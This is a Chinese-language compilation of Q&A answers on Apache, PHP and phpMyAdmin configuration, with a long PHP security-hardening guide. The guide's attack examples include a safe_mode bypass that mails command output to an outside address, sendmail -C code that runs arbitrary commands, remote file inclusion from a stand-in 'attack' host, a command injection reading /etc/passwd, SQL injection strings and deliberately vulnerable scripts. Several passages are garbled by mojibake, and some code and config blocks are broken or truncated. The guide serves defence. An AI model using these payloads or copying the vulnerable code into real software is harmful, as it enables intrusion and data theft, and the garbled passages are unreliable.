㈠ 如何配置phpadmin
phpadmin就是一個產品,用於管理mysql資料庫的,畢竟很多資料庫伺服器不能夠公開連接,所以只能夠使用http的方式來進行連接管理。
下載phpadmin( http://xj-http.skycn.net:8181/down/phpMyAdmin-2.6.1-rc2.zip)解壓到apache能夠訪問的一個目錄中(首先apache和php已經集成好了,能夠瀏覽php頁面)。運行訪問index.php會出現一些提示情況。如果你的mysql安全設置不錯的話,可能默認情況下是不能夠連接到你的伺服器的,需要修改一些配置信息。
修改phpadmin/config.inc.php文件,其中主要是對mysql連接方式,連接路徑以及用戶名密碼的設置。
修改如下:
$cfg['PmaAbsoluteUri'] = 'http://localhost/phpadmin/';
$cfg['PmaAbsoluteUri_DisableWarning'] = TRUE;
$cfg['blowfish_secret'] = 'admin';
$cfg['Servers'][$i]['port'] = ''; // MySQL port - leave blank for default port
$cfg['Servers'][$i]['socket'] = ''; // Path to the socket - leave blank for default socket
$cfg['Servers'][$i]['connect_type'] = 'tcp'; // How to connect to MySQL server ('tcp' or 'socket')
$cfg['Servers'][$i]['extension'] = 'mysql'; // The php MySQL extension to use ('mysql' or 'mysqli')
$cfg['Servers'][$i]['compress'] = FALSE; // Use compressed protocol for the MySQL connection
// (requires PHP >= 4.3.0)
$cfg['Servers'][$i]['controluser'] = ''; // MySQL control user settings
// (this user must have read-only
$cfg['Servers'][$i]['controlpass'] = ''; // access to the "mysql/user"
// and "mysql/db" tables).
// The controluser is also
// used for all relational
// features (pmadb)
$cfg['Servers'][$i]['auth_type'] = 'cookie'; // Authentication method (config, http or cookie based)?
$cfg['Servers'][$i]['user'] = ''; // MySQL user
$cfg['Servers'][$i]['password'] = ''; // MySQL password (only needed其中比較重要的幾個參數意義:
'PmaAbsoluteUri' phpadmin的全路徑,如果在apache中設定了一個alias的話就使用這個了
'PmaAbsoluteUri_DisableWarning' 這個好像是用於取消警告的,經常安裝好了在訪問的頁面上面會出現一些紅色字體的警告(安全等等),如果設置成為true就不出現了
'blowfish_secret' 這個是如果授權方式設置成為cookie的話就會使用這個來進行加密存入到cookie中的用戶名和密碼
'auth_type' 用於設置登陸方式,config是直接從這個文件中獲取user/password然後連接資料庫,http則是在客戶端訪問的時候會彈出一個輸入用戶名密碼的框進行認證處理 cookie則是通過頁面輸入用戶名密碼進行連接。其中config的安全等級最低,cookie的等級最高,不過如果禁用了cookie則無法使用cookie的方式進行認證。
通常設置成為cookie的方式以後要在apache的httpd.conf文件中修改對應的配置:
#added for phpmyadmin
Alias /phpadmin/ "website/phpMyAdmin-2.6.1-rc2/"
#php_admin_flag engine on
#php_admin_flag safe_mode off DirectoryIndex index.php
Options Indexes MultiViews
AllowOverride None
Order allow,deny
Allow from all
#php_admin_flag engine on
#php_admin_flag safe_mode off
#php_admin_value open_basedir none
#php_admin_value open_basedir "website/phpMyAdmin-2.6.1-rc2/" 當然主要是設置訪問許可權和別名 <Directory "D:/MyPHP/Apache2.2/htdocs">
AllowOverride None
Order allow,deny
Allow from all
</Directory>
Alias /phpmyadmin "D:/MyPHP/Apache2.2/htdocs"
㈡ php_admin_value open_basedir設置的目錄不生效,還是會可以瀏覽其它網站目錄
「還是會可以瀏覽其它網站目錄」,
你是想配置什麼?
open_basedir只是定義php能操作的目錄,
能不能瀏覽訪問不是他來配置的吧
你可以在apache的配置中或者在目錄中放個.htaccess文件。如
<Directory "目錄">
Order deny,allow
deny from all
</Directory>
㈢ LNMP模式下如何開啟PHP錯誤日誌
500錯誤首先就需要先開啟php錯誤日誌,通過php錯誤日誌來排錯。
LNMP下的錯誤需要編輯 /usr/local/php/etc/php-fpm.conf 加上
php_admin_value[error_log] = /usr/local/php/var/log/php_errors.log
php_admin_flag[log_errors] = on
或在/usr/local/php/etc/php-fpm.conf里設置,加上catch_workers_output
= yes,錯誤信息就會記錄到php-fpm.conf里error_log設置的文件里。 上述兩種方法都行,重啟php-fpm生效
同理php.ini里的display_errors也是需要在php-fpm.conf里設置的,加上php_flag[display_errors]
= On就開啟了。 有時可能錯誤日誌文件不自動創建,可以執行:touch
/usr/local/php/var/log/php_errors.log
㈣ php中,value到底是干什麼用的
這里的value就是起賦值作用的。意思是:第一個單選按鈕顯示為男,賦值為1;第二個顯示為女的,賦值為2;其實這里的value僅僅起標識作用。你也可以將value賦值為男,女。只要你能分清那個表示男,那個表示女就可以了。
㈤ 如何修改文件上傳大小限制
此法不用直接.修改php.ini,適用於虛擬主機。
配置Apache支持.htaccess
//找到Options FollowSymLinks
AllowOverride None//修改為Options FollowSymLinks
AllowOverride All//就可以了
在目錄下新建一個.htaccess文件,windows默認是不允許這么乾的,可以在Dreamweaver的文件管理下新建,就不會了。
.htaccess里寫入
php_value post_max_size 12m
php_value upload_max_filesize 12m
php_value max_execution_time 120
php_value max_input_time 240
就OK了
補充解釋:
使用ini_set("post_max_size","80M");的方法是行不通的。
post_max_size的可修改范圍是PHP_INI_PERDIR。
PHP_INI_PERDIR是域內指令只能在php.ini、httpd.conf或.htaccess文件中修改,故行不通。
php_value name value
設定指定指令的值。僅能用於 PHP_INI_ALL 和 PHP_INI_PERDIR 類型的指令。要清除上一個設定的值,將值設為 none 。
注: 不要用 php_value 來設定布爾值。應該用 php_flag (見下面)來替代。
php_flag name on|off
用於設定布爾值類型的配置指令。僅能用於 PHP_INI_ALL 和 PHP_INI_PERDIR 類型的指令。
php_admin_value name value
設定指定指令的值。不能在 .htaccess 文件中使用。任何在 php_admin_value 中設定的值不能被 .htaccess 或者 virtualhost 中的指令覆蓋。要清除上一個設定的值,將值設為 none 。
php_admin_flag name on|off
用於設定布爾值類型的配置指令。不能在 .htaccess 文件中使用。任何在 php_admin_flag 中設定的值不能被 .htaccess 或者 virtualhost 中的指令覆蓋。
㈥ 怎樣在Apache里修改PHP的配置
當使用 PHP 作為 Apache 模塊時,也可以用 Apache 的配置文件(例如 httpd.conf)和 .htaccess 文件中的指令來修改 PHP 的配置設定。需要有「AllowOverride Options」或「AllowOverride All」許可權才可以。
有幾個 Apache 指令可以使用戶在 Apache 配置文件內部修改 PHP 的配置。哪些指令屬於 PHP_INI_ALL,PHP_INI_PERDIR 或 PHP_INI_SYSTEM 中的哪一個,請參考附錄中的 php.ini 配置選項列表。
php_value name value
設定指定的值。只能用於 PHP_INI_ALL 或 PHP_INI_PERDIR 類型的指令。要清除先前設定的值,把 value 設為 none。
不要用 php_value 設定布爾值。應該用 php_flag。
php_flag name on|off
用來設定布爾值的配置指令。僅能用於 PHP_INI_ALL 和 PHP_INI_PERDIR 類型的指令。
php_admin_value name value
設定指定的指令的值。不能用於 .htaccess 文件。任何用 php_admin_value 設定的指令都不能被 .htaccess 或 virtualhost 中的指令覆蓋。要清除先前設定的值,把 value 設為 none。
php_admin_flag name on|off
用來設定布爾值的配置指令。不能用於 .htaccess 文件。任何用 php_admin_flag 設定的指令都不能被 .htaccess 或 virtualhost 中的指令覆蓋Apache 配置例子:
<IfMole mod_php5.c>
php_value include_path ".:/usr/local/lib/php"php_admin_flag engine on
</IfMole>
<IfMole mod_php4.c>
php_value include_path ".:/usr/local/lib/php"php_admin_flag engine on
</IfMole>
注意:PHP 常量不存在於 PHP 之外。例如在 httpd.conf 中不能使用 PHP 常量如 E_ALL 或 E_NOTICE 來設定 error_reporting 指令,因為其無意義,實際等於 0。應該用相應的掩碼值來替代。這些常量可以在 php.ini 中使用。
㈦ php安全配置 如何配置使其更安全
一、Web伺服器安全
PHP其實不過是Web伺服器的一個模塊功能,所以首先要保證Web伺服器的安全。當然Web伺服器要安全又必須是先保證系統安全,這樣就扯遠了,無窮無盡。PHP可以和各種Web伺服器結合,這里也只討論Apache。非常建議以chroot方式安裝啟動Apache,這樣即使Apache和PHP及其腳本出現漏洞,受影響的也只有這個禁錮的系統,不會危害實際系統。但是使用chroot的Apache後,給應用也會帶來一定的麻煩,比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接,這在效率上會稍微差一點。還有mail函數發送郵件也是個問題,因為php.ini里的:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = [email protected]
都是針對Win32平台,所以需要在chroot環境下調整好sendmail。
二、PHP本身問題
1、遠程溢出
PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區溢出漏洞,而且攻擊程序已經廣泛流傳,成功率非常高:
http://packetstormsecurity.org/0204-exploits/7350fun
http://hsj.shadowpenguin.org/misc/php3018_exp.txt
2、遠程拒絕服務
PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞,雖然不能獲得本地用戶許可權,但是也能造成拒絕服務。
3、safe_mode繞過漏洞
還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數繞過safe_mode限制執行命令漏洞,4.0.5版本開始mail函數增加了第五個參數,由於設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單,只需用分號隔開後面加shell命令就可以了,比如存在PHP腳本evil.php:
<? mail("foo@bar,"foo","bar","",$bar); ?>
執行如下的URL:
http://foo.com/evil.php?bar=;/usr/bin/id|mail [email protected]
這將id執行的結果發送給[email protected]。
對於4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數,所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令:
<?
# 注意,下面這兩個必須是不存在的,或者它們的屬主和本腳本的屬主是一樣
$script="/tmp/script123";
$cf="/tmp/cf123";
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本,這樣才能消除基本的安全問題。
三、PHP本身的安全配置
PHP的配置非常靈活,可以通過php.ini, httpd.conf, .htaccess文件(該目錄必須設置了AllowOverride All或Options)進行設置,還可以在腳本程序里使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。
如果配置選項是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之後必須重啟apache才能生效。其中php.ini設置的選項是對Web伺服器所有腳本生效,httpd.conf里設置的選項是對該定義的目錄下所有腳本生效。
如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置,也可以通過在腳本程序自身用ini_set()函數設定,它們修改的是Local值,改了以後馬上生效。但是.htaccess只對當前目錄的腳本程序生效,ini_set()函數只對該腳本程序設置ini_set()函數以後的代碼生效。各個版本的選項屬性可能不盡相同,可以用如下命令查找當前源代碼的main.c文件得到所有的選項,以及它的屬性:
# grep PHP_INI_ /PHP_SRC/main/main.c
在討論PHP安全配置之前,應該好好了解PHP的safe_mode模式。
1、safe_mode
safe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設置。要啟用safe_mode,只需修改php.ini:
safe_mode = On
或者修改httpd.conf,定義目錄:
<Directory /var/www>
Options FollowSymLinks
php_admin_value safe_mode 1
</Directory>
重啟apache後safe_mode就生效了。啟動safe_mode,會對許多PHP函數進行限制,特別是和系統相關的文件打開、命令執行等函數。
所有操作文件的函數將只能操作與腳本UID相同的文件,比如test.php腳本的內容為:
<?include("index.html")?>
幾個文件的屬性如下:
# ls -la
total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html
-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php
在瀏覽器請求test.php會提示如下的錯誤信息:
Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1
如果被操作文件所在目錄的UID和腳本UID一致,那麼該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途,絕對禁止使用root做為php腳本的屬主,這樣就達不到safe_mode的效果了。
如果想將其放寬到GID比較,則打開 safe_mode_gid可以考慮只比較文件的GID,可以設置如下選項:
safe_mode_gid = On
設置了safe_mode以後,所有命令執行的函數將被限制只能執行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls -l`這種執行命令的方式會被禁止。如果確實需要調用其它程序,可以在php.ini做如下設置:
safe_mode_exec_dir = /usr/local/php/exec
然後拷貝程序到該目錄,那麼php腳本就可以用system等函數來執行該程序。而且該目錄里的shell腳本還是可以調用其它目錄里的系統命令。
safe_mode_include_dir string
當從此目錄及其子目錄(目錄必須在 include_path 中或者用完整路徑來包含)包含文件時越過 UID/GID 檢查。
從 PHP 4.2.0 開始,本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑,而不只是一個目錄。
指定的限制實際上是一個前綴,而非一個目錄名。這也就是說「safe_mode_include_dir = /dir/incl」將允許訪問「/dir/include」和「/dir/incls」,如果它們存在。如果您希望將訪問控制在一個指定的目錄,那麼請在結尾加上一個斜線,例如:「safe_mode_include_dir = /dir/incl/」。
safe_mode_allowed_env_vars string
設置某些環境變罧贍蓯喬痹詰陌踩?笨凇1局噶畎??幸桓齠漢歐指艫那白毫斜懟T詘踩?J較攏?沒е荒芨謀淠切┟?志哂性謖飫鍰峁┑那白旱幕肪潮淞俊D?杴榭魷攏?沒е荒萇柚靡?PHP_ 開頭的環境變數(例如 PHP_FOO = BAR)。
注: 如果本指令為空,PHP 將使用戶可以修改任何環境變數!
safe_mode_protected_env_vars string
本指令包含有一個逗號分隔的環境變數的列表,最終用戶不能用 putenv() 來改變這些環境變數。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變數。
雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制,可能對應用帶來影響,所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。
討論完safe_mode後,下面結合程序代碼實際可能出現的問題討論如何通過對PHP伺服器端的配置來避免出現的漏洞。
2、變數濫用
PHP默認register_globals = On,對於GET, POST, Cookie, Environment, Session的變罧梢災苯幼⒉岢扇?直淞俊K?塹淖⒉崴承蚴莢ariables_order = "EGPCS"(可以通過php.ini修改),同名變數variables_order右邊的覆蓋左邊,所以變數的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變數初始化的習慣,像如下的程序片斷就極易受到攻擊:
<?
//test_1.php
if ($pass == "hello")
$auth = 1;
if ($auth == 1)
echo "some important information";
else
echo "nothing";
?>
攻擊者只需用如下的請求就能繞過檢查:
http://victim/test_1.php?auth=1
這雖然是一個很弱智的錯誤,但一些著名的程序也有犯過這種錯誤,比如phpnuke的遠程文件拷貝漏洞http://www.securityfocus.com/bid/3361
PHP-4.1.0發布的時候建議關閉register_globals,並提供了7個特殊的數組變數來使用各種變數。對於從GET、POST、COOKIE等來的變數並不會直接注冊成變數,必需通過數組變數來存取。PHP-4.2.0發布的時候,php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值,一般為0,避免了攻擊者控制判斷變數。
解決方法:
配置文件php.ini設置register_globals = Off。
要求程序員對作為判斷的變數在程序最開始初始化一個值。
3、文件打開
極易受攻擊的代碼片斷:
<?
//test_2.php
if (!($str = readfile("$filename"))) {
echo("Could not open file: $filename<BR>\n");
exit;
}
else {
echo $str;
}
?>
由於攻擊者可以指定任意的$filename,攻擊者用如下的請求就可以看到/etc/passwd:
http://victim/test_2.php?filename=/etc/passwd
如下請求可以讀php文件本身:
http://victim/test_2.php?filename=test_2.php
PHP中文件打開函數還有fopen(), file()等,如果對文件名變數檢查不嚴就會造成伺服器重要文件被訪問讀取。
解決方法:
如非特殊需要,把php的文件操作限制在web目錄裡面。以下是修改apache配置文件httpd.conf的一個例子:
<Directory /usr/local/apache/htdocs>
php_admin_value open_basedir /usr/local/apache/htdocs
</Directory>
重啟apache後,/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了,否則PHP就會報錯:
Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.
使用safe_mode模式也能避免這種問題,前面已經討論過了。
4、包含文件
極易受攻擊的代碼片斷:
<?
//test_3.php
if(file_exists($filename))
include("$filename");
?>
這種不負責任的代碼會造成相當大的危害,攻擊者用如下請求可以得到/etc/passwd文件:
http://victim/test_3.php?filename=/etc/passwd
如果對於Unix版的PHP(Win版的PHP不支持遠程打開文件)攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件,http://attack/attack.txt的內容是<?passthru("ls /etc")?>,那麼如下的請求就可以在目標主機執行命令ls /etc:
http://victim/test_3.php?filename=http://attack/attack.txt
攻擊者甚至可以通過包含apache的日誌文件access.log和error.log來得到執行命令的代碼,不過由於干擾信息太多,有時不易成功。
對於另外一種形式,如下代碼片斷:
<?
//test_4.php
include("$lib/config.php");
?>
攻擊者可以在自己的主機建立一個包含執行命令代碼的config.php文件,然後用如下請求也可以在目標主機執行命令:
http://victim/test_4.php?lib=http://attack
PHP的包含函數有include(), include_once(), require(), require_once。如果對包含文件名變數檢查不嚴就會對系統造成嚴重危險,可以遠程執行命令。
解決方法:
要求程序員包含文件里的參數盡量不要使用變數,如果使用變數,就一定要嚴格檢查要包含的文件名,絕對不能由用戶任意指定。
如前面文件打開中限制PHP操作路徑是一個必要的選項。另外,如非特殊需要,一定要關閉PHP的遠程文件打開功能。修改php.ini文件:
allow_url_fopen = Off
重啟apache。
5、文件上傳
php的文件上傳機制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時目錄(默認是系統的臨時目錄,如:/tmp)里的一個類似phpxXuoXG的隨機臨時文件,程序執行結束,該臨時文件也被刪除。PHP給上傳的文件定義了四個變數:(如form變數名是file,而且register_globals打開)
$file #就是保存到伺服器端的臨時文件(如/tmp/phpxXuoXG )
$file_size #上傳文件的大小
$file_name #上傳文件的原始名稱
$file_type #上傳文件的類型
推薦使用:
$HTTP_POST_FILES[file][tmp_name]
$HTTP_POST_FILES[file][size]
$HTTP_POST_FILES[file][name]
$HTTP_POST_FILES[file][type]
這是一個最簡單的文件上傳代碼:
<?
//test_5.php
if(isset($upload) && $file != "none") {
($file, "/usr/local/apache/htdocs/upload/".$file_name);
echo "文件".$file_name."上傳成功!點擊<a href=\"$PHP_SELF\">繼續上傳</a>";
exit;
}
?>
<html>
<head>
<title>文件上傳</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<form enctype="multipart/form-data" method="post">
上傳文件:
<input type="file" name="file" size="30">
<input type="submit" name="upload" value="上傳">
</form>
</body>
</html>
這樣的上傳代碼存在讀取任意文件和執行命令的重大問題。
下面的請求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test(注意:這個目錄必須nobody可寫)下的attack.txt文件里:
http://victim/test_5.php?upload= ... ile_name=attack.txt
然後可以用如下請求讀取口令文件:
http://victim/test/attack.txt
攻擊者可以把php文件拷貝成其它擴展名,泄漏腳本源代碼。
攻擊者可以自定義form里file_name變數的值,上傳覆蓋任意有寫許可權的文件。
攻擊者還可以上傳PHP腳本執行主機的命令。
解決方法:
PHP-4.0.3以後提供了is_uploaded_file和move_uploaded_file函數,可以檢查操作的文件是否是用戶上傳的文件,從而避免把系統文件拷貝到web目錄。
使用$HTTP_POST_FILES數組來讀取用戶上傳的文件變數。
嚴格檢查上傳變數。比如不允許是php腳本文件。
把PHP腳本操作限制在web目錄可以避免程序員使用函數把系統文件拷貝到web目錄。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。
把PHP腳本用phpencode進行加密,避免由於操作泄漏源碼。
嚴格配置文件和目錄的許可權,只允許上傳的目錄能夠讓nobody用戶可寫。
對於上傳目錄去掉PHP解釋功能,可以通過修改httpd.conf實現:
<Directory /usr/local/apache/htdocs/upload>
php_flag engine off
#如果是php3換成php3_engine off
</Directory>
重啟apache,upload目錄的php文件就不能被apache解釋了,即使上傳了php文件也沒有問題,只能直接顯示源碼。
6、命令執行
下面的代碼片斷是從PHPNetToolpack摘出,詳細的描述見:
http://www.securityfocus.com/bid/4303
<?
//test_6.php
system("traceroute $a_query",$ret_strs);
?>
由於程序沒有過濾$a_query變數,所以攻擊者可以用分號來追加執行命令。
攻擊者輸入如下請求可以執行cat /etc/passwd命令:
http://victim/test_6.php?a_query=www.example.com;cat /etc/passwd
PHP的命令執行函數還有system(), passthru(), popen()和``等。命令執行函數非常危險,慎用。如果要使用一定要嚴格檢查用戶輸入。
解決方法:
要求程序員使用escapeshellcmd()函數過濾用戶輸入的shell命令。
啟用safe_mode可以杜絕很多執行命令的問題,不過要注意PHP的版本一定要是最新的,小於PHP-4.2.2的都可能繞過safe_mode的限制去執行命令。
7、sql_inject
如下的SQL語句如果未對變數進行處理就會存在問題:
select * from login where user=$user and pass=$pass
攻擊者可以用戶名和口令都輸入1 or 1=1繞過驗證。
不過幸虧PHP有一個默認的選項magic_quotes_gpc = On,該選項使得從GET, POST, COOKIE來的變數自動加了addslashes()操作。上面SQL語句變成了:
select * from login where user=1\ or 1=\1 and pass=1\ or 1=\1
從而避免了此類sql_inject攻擊。
對於數字類型的欄位,很多程序員會這樣寫:
select * from test where id=$id
由於變數沒有用單引號擴起來,就會造成sql_inject攻擊。幸虧MySQL功能簡單,沒有sqlserver等資料庫有執行命令的SQL語句,而且PHP的mysql_query()函數也只允許執行一條SQL語句,所以用分號隔開多條SQL語句的攻擊也不能奏效。但是攻擊者起碼還可以讓查詢語句出錯,泄漏系統的一些信息,或者一些意想不到的情況。
解決方法:
要求程序員對所有用戶提交的要放到SQL語句的變數進行過濾。
即使是數字類型的欄位,變數也要用單引號擴起來,MySQL自己會把字串處理成數字。
在MySQL里不要給PHP程序高級別許可權的用戶,只允許對自己的庫進行操作,這也避免了程序出現問題被 SELECT INTO OUTFILE ... 這種攻擊。
8、警告及錯誤信息
PHP默認顯示所有的警告及錯誤信息:
error_reporting = E_ALL & ~E_NOTICE
display_errors = On
在平時開發調試時這非常有用,可以根據警告信息馬上找到程序錯誤所在。
正式應用時,警告及錯誤信息讓用戶不知所措,而且給攻擊者泄漏了腳本所在的物理路徑,為攻擊者的進一步攻擊提供了有利的信息。而且由於自己沒有訪問到錯誤的地方,反而不能及時修改程序的錯誤。所以把PHP的所有警告及錯誤信息記錄到一個日誌文件是非常明智的,即不給攻擊者泄漏物理路徑,又能讓自己知道程序錯誤所在。
修改php.ini中關於Error handling and logging部分內容:
error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log
然後重啟apache,注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫。
9、disable_functions
如果覺得有些函數還有威脅,可以設置php.ini里的disable_functions(這個選項不能在httpd.conf里設置),比如:
disable_functions = phpinfo, get_cfg_var
可以指定多個函數,用逗號分開。重啟apache後,phpinfo, get_cfg_var函數都被禁止了。建議關閉函數phpinfo, get_cfg_var,這兩個函數容易泄漏伺服器信息,而且沒有實際用處。
10、disable_classes
這個選項是從PHP-4.3.2開始才有的,它可以禁用某些類,如果有多個用逗號分隔類名。disable_classes也不能在httpd.conf里設置,只能在php.ini配置文件里修改。
11、open_basedir
前面分析常式的時候也多次提到用open_basedir對腳本操作路徑進行限制,這里再介紹一下它的特性。用open_basedir指定的限制實際上是前綴,不是目錄名。也就是說 "open_basedir = /dir/incl" 也會允許訪問 "/dir/include" 和 "/dir/incls",如果它們存在的話。如果要將訪問限制在僅為指定的目錄,用斜線結束路徑名。例如:"open_basedir = /dir/incl/"。
可以設置多個目錄,在Windows中,用分號分隔目錄。在任何其它系統中用冒號分隔目錄。作為Apache模塊時,父目錄中的open_basedir路徑自動被繼承。
四、其它安全配置
1、取消其它用戶對常用、重要系統命令的讀寫執行許可權
一般管理員維護只需一個普通用戶和管理用戶,除了這兩個用戶,給其它用戶能夠執行和訪問的東西應該越少越好,所以取消其它用戶對常用、重要系統命令的讀寫執行許可權能在程序或者服務出現漏洞的時候給攻擊者帶來很大的迷惑。記住一定要連讀的許可權也去掉,否則在linux下可以用/lib/ld-linux.so.2 /bin/ls這種方式來執行。
如果要取消某程如果是在chroot環境里,這個工作比較容易實現,否則,這項工作還是有些挑戰的。因為取消一些程序的執行許可權會導致一些服務運行不正常。PHP的mail函數需要/bin/sh去調用sendmail發信,所以/bin/bash的執行許可權不能去掉。這是一項比較累人的工作,
2、去掉apache日誌其它用戶的讀許可權
apache的access-log給一些出現本地包含漏洞的程序提供了方便之門。通過提交包含PHP代碼的URL,可以使access-log包含PHP代碼,那麼把包含文件指向access-log就可以執行那些PHP代碼,從而獲得本地訪問許可權。
如果有其它虛擬主機,也應該相應去掉該日誌文件其它用戶的讀許可權。
當然,如果你按照前面介紹的配置PHP那麼一般已經是無法讀取日誌文件了。
㈧ PHP的程序是怎樣調試的呢
環境需求與准備工作
--------------------------------------------------------------------------------
在安裝 PHP 做為 WWW 伺服器的一部份時,我們可以考慮用 UNIX 作業系統;或者是 Windows NT/95 等 Win32 API 的平台。當然,大部份的人都會使用 UNIX 來當作 PHP 的執行平台 (在 Windows NT 的使用者大多數都會選擇 IIS + ASP),因此,本書的所有內容以及范常式式都是在 UNIX 上為主。實際上,Linux + Apache + PHP 應是最經濟的選擇,因為這樣的組合幾乎是不用錢的,成本與效益比這也是最好的選擇。而許多成功站台的經驗,更是採用這種組合最好的背書。
Linux 作業系統方面,您可以選擇各式的 Linux 套件,包括 Slackware Linux、RedHat、OpenLinux、SuSE....等等,反正這方面的軟體在坊間也是很容易而且很便宜就可以買到。對學生而言,也可以去各大 FTP 站下載完整的系統安裝。
Apache 伺服器則是目前最多 WWW 網站所採用伺服器。您可以至 http://www.apache.org 下載最新版的程式及相關文件,若您覺得從國外下載要很久的話,也可以用它的 Mirror 站台下載。
PHP 則可以去它的官方網站 http://www.php.net 下載所需要的程式。
雖然目前 WindowsNT 或者 Windows98 等 Win32 的作業平台也能安裝 PHP 及 Apache 伺服器,不過這似乎沒什麼道理,因為 PHP 和 Apache 在 UNIX下可以跑得更快更好。
當然,若想使用商業化的作業平台,SUN、IBM、HP、DEC、SGI、NEC 等公司都有提供相關的 UNIX 或者是 WindowsNT 的作業平台。加上高安全性調整過後的 Apache 伺服器:Stronghold 或是其它支援 SSL 的 Apache 版本。這種組合,相信能滿足商業化的需求。而 PHP 就扮演著快速方便的 CGI 角色,讓客戶對站台的服務品質更加滿意。
快速設定及安裝
--------------------------------------------------------------------------------
以下是基本的安裝動作,作業環境是 UNIX 系列的作業平台。在安裝之前,要先下載 apache_1.3.x.tar.gz 及 php-3.0.x.tar.gz 二個檔案。可以將這二個檔案放在 /usr/src 中再開始執行以下的動作。而下面每個行號後的動作都是整串字連在一起的,在這可能會分行而造成誤會。
gzip -d -c apache_1.3.x.tar.gz | tar xvf -
gzip -d -c php-3.0.x.tar.gz | tar xvf -
cd apache_1.3.x
./configure --prefix=/www
cd ../php-3.0.x
./configure --with-mysql --with-apache=../apache_1.3.x --enable-track-vars
make
make install
cd ../apache_1.3.x
./configure --prefix=/www --activate-mole=src/moles/php3/libphp3.a
make
make install
第一、二行利用 gzip 及 tar 加上管道功能,將壓縮檔解壓還原。然後在 Apache 的原始檔目錄中執行環境設定,--prefix 選項指示 Apache 的安裝目錄路徑。之後進入 PHP3 的原始檔目錄中,若沒有 MySQL 資料庫,則可省略 --with-mysql 的選項,重要的是一定要加入 --with-apache 選項,而且 Apache 原始檔的路徑要正確。設定完 PHP3 之後就編譯、安裝到 Apache 的原始檔目錄中。之後在 Apache 原始檔目錄中再加入 PHP 的模組檔。在編譯及安裝 Apache 之後就初步完成了。之後就是要設定 Apache 才能讓 Web Server 順利運作。
值得注意的是,PHP 要和任何資料庫連線,都要在執行這些動作之前先將資料庫設好,並確定 Web Server 上可以順利存取資料庫系統。若有需要其它的一些 PHP 外部模組也要先設定好這些模組。
cd ../php-3.0.x
cp php3.ini-dist /usr/local/lib/php3.ini
之後將 php3.ini 放在指定的目錄,若有需要,也可以手動修改 php3.ini 檔檔,以符合使用的要求。
在 Apache 伺服器的設定方面,要在 Apache 的設定檔 httpd.conf 或 srm.conf 檔案中加入下面的字串。告訴 Apache 伺服器,副檔名 php3 是一個特殊的程式檔案。當然副檔名可以設成別的副檔名,還有一些站台將 php 的程式副檔名設為 phtml 也是不錯的選擇,反正這就要看 Webmaster 的規劃了。
AddType application/x-httpd-php3 .php3
--------------------------------------------------------------------------------
在 PHP 4.x 版的方法大致和 PHP 3.0.x 版相同,不同的地方在於 PHP 4.x 的目錄名稱及編譯後的模組放置目錄不同。此外,內定的副檔名也由 .php3 變成了 .php。當然在安裝前還是要先下載 PHP 4.x 的程式才行。
gzip -dc apache_1.3.x.tar.gz | tar xvf -
gzip -dc php-4.0.x.tar.gz | tar xvf -
cd apache_1.3.x
./configure --prefix=/www
cd ../php-4.0.x
./configure --with-mysql --with-apache=../apache_1.3.x --enable-track-vars
make
make install
cd ../apache_1.3.x
./configure --prefix=/www --activate-mole=src/moles/php4/libphp4.a
make
make install
cd ../php-4.0.x
cp php.ini-dist /usr/local/lib/php.ini
在 httpd.conf 或 srm.conf 加入
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
而 PHP 4.x 版中對 Apache 伺服器加入了新的環境變數設定項。
php_value [PHP directive name] [value]
php_flag [PHP directive name] [On|Off]
php_admin_value [PHP directive name] [value]
php_admin_flag [PHP directive name] [On|Off]
